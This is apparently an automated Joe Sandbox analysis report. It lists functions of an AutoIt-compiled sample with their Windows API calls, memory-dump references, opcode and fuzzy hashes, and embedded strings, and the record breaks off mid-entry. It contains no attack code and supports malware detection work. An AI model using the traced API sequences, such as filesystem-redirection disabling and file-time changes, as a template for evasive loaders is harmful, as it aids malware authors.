                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C63044
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: 97b203d8adfca545e68338bf47bb0cdce8fa0b7d071f2e0958a63b7a2ee23977
                                        • Instruction ID: 478f5734f3a369c1c1da1f6e126dae8d3d9a7f4806c7cf35222ba0009336d520
                                        • Opcode Fuzzy Hash: 97b203d8adfca545e68338bf47bb0cdce8fa0b7d071f2e0958a63b7a2ee23977
                                        • Instruction Fuzzy Hash: 76D05EB250032867DA20A7A4AC4EFCB3A6CDB04751F0002A1B655E20D1DAB89984CBE4
                                        Function 00C77F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C782F5
                                        • TerminateProcess.KERNEL32(00000000), ref: 00C782FC
                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C784DD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$CurrentFreeLibraryTerminate
                                        • String ID:
                                        • API String ID: 146820519-0
                                        • Opcode ID: 4c29a61aabf3baf3cb1f9009fa66a87829b6fde86c0e34a8e179630dd272e91e
                                        • Instruction ID: 2a286c5bc1776b2cf22e1e08bf5d0d36af69421a952da712895f9b3ab39dd379
                                        • Opcode Fuzzy Hash: 4c29a61aabf3baf3cb1f9009fa66a87829b6fde86c0e34a8e179630dd272e91e
                                        • Instruction Fuzzy Hash: AF127C71A083419FC724DF28C484B2ABBE5FF84314F04895DE9998B292DB71ED49CF92
                                        Function 00C25AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 200edf5e11790c1edfbf1c71bdd00be2cb57d27283168c6595b851960b4e398d
                                        • Instruction ID: 801808e7f36e31852a00a5077d6e80d48656cc49ba068de35f4eee0fc883fe24
                                        • Opcode Fuzzy Hash: 200edf5e11790c1edfbf1c71bdd00be2cb57d27283168c6595b851960b4e398d
                                        • Instruction Fuzzy Hash: EF5101B5E00629AFCB20DFA5E845FFFBBB8AF09310F140019F411A7691E7719A41EB61
                                        Function 00BF10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF1BF4
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF1BFC
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF1C07
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF1C12
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF1C1A
                                          • Part of subcall function 00BF1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF1C22
                                          • Part of subcall function 00BF1B4A: RegisterWindowMessageW.USER32(00000004,?,00BF12C4), ref: 00BF1BA2
                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BF136A
                                        • OleInitialize.OLE32 ref: 00BF1388
                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 00C324AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                        • String ID:
                                        • API String ID: 1986988660-0
                                        • Opcode ID: 06b8722bea76643c293fe34d38b7f16e9a2fc0aec999479851f767c3dd9571c5
                                        • Instruction ID: b3f94090980b8be25f4141d32c3fb6027b44ddb210e2c1af7c2c44055ec38f91
                                        • Opcode Fuzzy Hash: 06b8722bea76643c293fe34d38b7f16e9a2fc0aec999479851f767c3dd9571c5
                                        • Instruction Fuzzy Hash: 6671ADB49152048EC788EF7BE945F6D3AE0EB8A34435D856EE90AC73A3EB308445CF54
                                        Function 00BF54C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00BF556D
                                        • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00BF557D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 7ffd37057fb37e137f9bcc46d7066ff893bfd784e29f9199e85785b79f6641dc
                                        • Instruction ID: 4e1ce2bba6ab718d7045daa85b84254e0acc3e32385f64f44033b50e11609782
                                        • Opcode Fuzzy Hash: 7ffd37057fb37e137f9bcc46d7066ff893bfd784e29f9199e85785b79f6641dc
                                        • Instruction Fuzzy Hash: 02314F71A00609EFDB24CF68C881BADB7F6FB58314F148669EA1597240D771FE98CB90
                                        Function 00C286AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00C285CC,?,00CB8CC8,0000000C), ref: 00C28704
                                        • GetLastError.KERNEL32(?,00C285CC,?,00CB8CC8,0000000C), ref: 00C2870E
                                        • __dosmaperr.LIBCMT ref: 00C28739
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                        • String ID:
                                        • API String ID: 490808831-0
                                        • Opcode ID: 660996b35d396ca874c81f07386b4a79b4a6793c3dd18ae53cafd4d1dd5f0a89
                                        • Instruction ID: 526e4cb27c33e88aa27c0f232773f9ac4a9873c7b75bdcae0bf9463e914b527a
                                        • Opcode Fuzzy Hash: 660996b35d396ca874c81f07386b4a79b4a6793c3dd18ae53cafd4d1dd5f0a89
                                        • Instruction Fuzzy Hash: A7014932A0673026D624A334B849B7F67594B92B75F39011DF8348B9E3DEB0CD859290
                                        Function 00C62FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00C62CD4,?,?,?,00000004,00000001), ref: 00C62FF2
                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C62CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C63006
                                        • CloseHandle.KERNEL32(00000000,?,00C62CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C6300D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: 2b907f18e56ba5c2e0ad897b43cd49fbf1797aa3724864877b2c13be2ac02c06
                                        • Instruction ID: 7d406e50b623a7fc86a7421a37cc56e6f4d3711620221fafcf3006816d639fa6
                                        • Opcode Fuzzy Hash: 2b907f18e56ba5c2e0ad897b43cd49fbf1797aa3724864877b2c13be2ac02c06
                                        • Instruction Fuzzy Hash: 8AE0863228021077D6301755BC8DFCF3A1CD78AB71F104210F729750D086B01A0153BC
                                        Function 00C01310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 00C017F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: CALL
                                        • API String ID: 1385522511-4196123274
                                        • Opcode ID: 1bd1e109bb6ba5ba80066f1be4e5d9fbd4f8f563f5a0834a1d4eac0fdb8df81b
                                        • Instruction ID: 9e3323637661933f615e49bb8a77508e3b9cb116c04a59d4b7cd77e38beef69f
                                        • Opcode Fuzzy Hash: 1bd1e109bb6ba5ba80066f1be4e5d9fbd4f8f563f5a0834a1d4eac0fdb8df81b
                                        • Instruction Fuzzy Hash: 75227A706082419FC714DF15C880B2AFBF1BF85314F28896DF9968B3A1D772E985DB92
                                        Function 00C66EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 00C66F6B
                                          • Part of subcall function 00BF4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4EFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: LibraryLoad_wcslen
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 3312870042-2806939583
                                        • Opcode ID: df6a8d44ae0422c65fe023a0a49ae83b4b80bac7bb6554ab2fe03bbe74f758ab
                                        • Instruction ID: d86535439c9f0f54a9bc3f899f63131739f663f8dd5701eaf48c313c5e0ed1d3
                                        • Opcode Fuzzy Hash: df6a8d44ae0422c65fe023a0a49ae83b4b80bac7bb6554ab2fe03bbe74f758ab
                                        • Instruction Fuzzy Hash: B0B174711082058FCB24EF24C49197EB7E5AF94344F0489ADF59A97262DF70EE4DCB92
                                        Function 00BF2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetOpenFileNameW.COMDLG32(?), ref: 00C32C8C
                                          • Part of subcall function 00BF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF3A97,?,?,00BF2E7F,?,?,?,00000000), ref: 00BF3AC2
                                          • Part of subcall function 00BF2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BF2DC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Name$Path$FileFullLongOpen
                                        • String ID: X
                                        • API String ID: 779396738-3081909835
                                        • Opcode ID: d141aef89b3cabeb768c573dd891e4bae79e2e6efb3eb936cd8687c9ae57d5f1
                                        • Instruction ID: cadecf0b9e654caa22a6cf703ff4d638bfcdd6b11895f307ef34e9e80308aebd
                                        • Opcode Fuzzy Hash: d141aef89b3cabeb768c573dd891e4bae79e2e6efb3eb936cd8687c9ae57d5f1
                                        • Instruction Fuzzy Hash: B7219371A1029C9FDF01DF94C845BEEBBF8AF49714F004059E505A7241DBB85A8D8F61
                                        Function 00C62557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID: EA06
                                        • API String ID: 2638373210-3962188686
                                        • Opcode ID: 88a4c048b0351ee271d70b80468123d7d53b8956b322d93fdf994b1e31034fb0
                                        • Instruction ID: f16178200f997a495e00052a2c1e7c5c6bf9a0a6b610c3838b36b6b1c6c1156b
                                        • Opcode Fuzzy Hash: 88a4c048b0351ee271d70b80468123d7d53b8956b322d93fdf994b1e31034fb0
                                        • Instruction Fuzzy Hash: 4101B5729042587EDF28C7A8C856EEEBBF8DB05301F00455AF593D21C1E5B8E7489B60
                                        Function 00BF3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF3908
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_
                                        • String ID:
                                        • API String ID: 1144537725-0
                                        • Opcode ID: 8274acecbc1db7813116520169b171ad38d720ad646a8b1b502bc5b222ef153f
                                        • Instruction ID: fbce952441bb4c7b9853651944502407f763de2ceadce62e32c257ae6be3f511
                                        • Opcode Fuzzy Hash: 8274acecbc1db7813116520169b171ad38d720ad646a8b1b502bc5b222ef153f
                                        • Instruction Fuzzy Hash: 5E31D5705043449FD720DF25D884BABBBF8FF49748F04096EFA9A83251E775AA48CB52
                                        Function 00BF5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BF949C,?,00008000), ref: 00BF5773
                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00BF949C,?,00008000), ref: 00C34052
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 8ab2116d3be84d56ec61ca043373cd50368dc74ca7d9eb49c164a07b92aaead3
                                        • Instruction ID: 3ecaea904eefcfeb37fd14dddf6833428ffbb2bcbffd25ac0708cf5dedf42503
                                        • Opcode Fuzzy Hash: 8ab2116d3be84d56ec61ca043373cd50368dc74ca7d9eb49c164a07b92aaead3
                                        • Instruction Fuzzy Hash: 10019230245225B6E7751A2ADC4EFAB7F98EF027B0F108300BBAC5B1E1CBB45854CB90
                                        Function 00BFB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 00BFBB4E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID:
                                        • API String ID: 1385522511-0
                                        • Opcode ID: 523dd63f555f5d614040698c8bd3adf1c372ed1c5379247b1a1ea9f7231fb743
                                        • Instruction ID: f04875dbfa20c1b129a4c6497e3c17221b20b12b0b09133b67a590475eb51423
                                        • Opcode Fuzzy Hash: 523dd63f555f5d614040698c8bd3adf1c372ed1c5379247b1a1ea9f7231fb743
                                        • Instruction Fuzzy Hash: C6326B74A042099FDB24CF54C894FBEB7F9FB44350F248099EA15AB2A1C7B4EE45CB91
                                        Function 00B61070 Relevance: 1.7, APIs: 1, Instructions: 173COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00B608E0: GetFileAttributesW.KERNELBASE(?), ref: 00B608EB
                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00B611E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AttributesCreateDirectoryFile
                                        • String ID:
                                        • API String ID: 3401506121-0
                                        • Opcode ID: f7b3b0fd656f5791e092d8cfbffbb11eb292eded3e88fb85f47558a6f19bffc9
                                        • Instruction ID: c4f9022086207fa12d9464db504da270887e9c134400ed8194525f08b8773da3
                                        • Opcode Fuzzy Hash: f7b3b0fd656f5791e092d8cfbffbb11eb292eded3e88fb85f47558a6f19bffc9
                                        • Instruction Fuzzy Hash: 9261A631E2020997EF14EFB4D954BEF737AEF58700F0045A8A60DE7290EB799A44CB65
                                        Function 00BF4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF4EDD,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E9C
                                          • Part of subcall function 00BF4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BF4EAE
                                          • Part of subcall function 00BF4E90: FreeLibrary.KERNEL32(00000000,?,?,00BF4EDD,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4EC0
                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4EFD
                                          • Part of subcall function 00BF4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C33CDE,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E62
                                          • Part of subcall function 00BF4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BF4E74
                                          • Part of subcall function 00BF4E59: FreeLibrary.KERNEL32(00000000,?,?,00C33CDE,?,00CC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BF4E87
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressFreeProc
                                        • String ID:
                                        • API String ID: 2632591731-0
                                        • Opcode ID: 8a05b13c7212a8d0a164f39b8f0279c1f7d738b236eecf3c7476942d0344ea20
                                        • Instruction ID: a9b3f8050169fc42d9049d3f02698b03ac884b055ecbd1f5b6aac8822a420427
                                        • Opcode Fuzzy Hash: 8a05b13c7212a8d0a164f39b8f0279c1f7d738b236eecf3c7476942d0344ea20
                                        • Instruction Fuzzy Hash: AA11E332610209ABCB24BB64DC42FFE77E5AF40710F20846DF64AA71C1EF70AA599760
                                        Function 00C28402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
